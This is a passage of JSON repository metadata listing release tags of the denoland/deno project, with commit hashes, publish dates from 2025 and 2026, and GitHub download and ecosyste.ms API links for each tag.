2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T1